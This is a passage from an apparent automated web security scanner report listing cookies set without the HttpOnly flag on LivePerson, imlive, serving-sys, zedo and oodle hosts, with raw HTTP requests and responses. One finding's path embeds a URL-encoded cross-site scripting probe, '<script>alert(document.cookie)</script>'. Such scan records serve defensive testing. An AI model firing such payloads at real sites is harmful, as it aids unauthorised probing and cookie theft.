HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net
HumanClickCHATKEY=7678006185736106283; path=/hc/5296924; secure

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:16:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickKEY=1417917221691646769; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickCHATKEY=7678006185736106283; path=/hc/5296924; secure
Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H1417917221691646769-7678006185736106283K15949656
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0

11.275. https://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LPit=false; path=/hc/5296924
HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
LivePersonID=-16101423669632-1296223154:1296223611:-1:-1:-1; expires=Sat, 28-Jan-2012 14:06:54 GMT; path=/hc/5296924; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.276. https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net
HumanClickKEY=8955939450992135978; path=/hc/5296924
HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.277. http://br.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=646c9815-aa9c-4aef-98a9-a90044ab80e5&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:50 GMT; path=/
ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.278. http://br.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://br.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=cf49a80c-605c-401b-ba10-8fc2221aabca&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:52 GMT; path=/
ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pbr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:16:52 GMT; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=4msjt555stl42j45oorr4kmm; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=4msjt555stl42j45oorr4kmm; path=/; HttpOnly
Set-Cookie: spvdr=vd=cf49a80c-605c-401b-ba10-8fc2221aabca&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:52 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pbr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 14:16:52 GMT; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:51 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

11.279. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Fri, 29-Apr-2011 00:22:47 GMT; domain=bs.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 29-Apr-2011 00:22:47 GMT; domain=.serving-sys.com; path=/
C_=BlankImage

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B3=89PS000000000GsZ7lgH0000000001sG89PT000000000RsZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abLU07l00000Rh5iUabLQ07l00000Gf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; C4=; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Fri, 29-Apr-2011 00:22:47 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 29-Apr-2011 00:22:47 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 29 Jan 2011 05:22:47 GMT
Connection: close

11.280. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=bs.serving-sys.com; path=/
A3=f+JvabEk02WG00002h5iUabLQ07l00000Gh5j3abPm07l00000Sgn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
B3=7lgH0000000001sG89PS000000000GsZ89PT000000000Ss+852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Fri, 29-Apr-2011 00:22:54 GMT; domain=.serving-sys.com; path=/
C_1348\=4478147

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.281. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=bs.serving-sys.com; path=/
A3=f+JvabEl02WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabEl02WG00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7lgH0000000001sG852G0000000003sS7dNH0000000001sZ8cVQ0000000001sV83xP0000000001sF6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Fri, 28 Jan 2011 17:37:30 GMT
Connection: close
Content-Length: 3021

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

11.282. http://c.chango.com/collector/tag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.chango.com
Path:	/collector/tag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_t=21d8e954-2b06-11e0-8e8a-0025900870d2; Domain=chango.com; expires=Mon, 25 Jan 2021 17:43:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.283. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

11.284. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

11.285. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

11.286. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

11.287. http://cafr.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=afa07c32-e9d6-40f5-9fbf-41c391d891a9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.288. http://cafr.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=a36349bf-85d7-449a-ba14-1d2b86b28f62&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:54 GMT; path=/
icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pcafr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:16:54 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bpzhxgbfsoyifii5lvocld45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bpzhxgbfsoyifii5lvocld45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a36349bf-85d7-449a-ba14-1d2b86b28f62&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:54 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pcafr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:16:54 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:54 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.289. http://cbs6albany.oodle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cbs6albany.oodle.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

otu=4cb1554b3fac0f3130b9462891294fa6; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
ots=9071808584648e0860c7c6ca699e90c4; path=/; domain=.oodle.com
a=dT1GNDQ0QTkwNTRENDNBNDg3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYyNzg2NjM7fQ%3D%3D; path=/; domain=.oodle.com

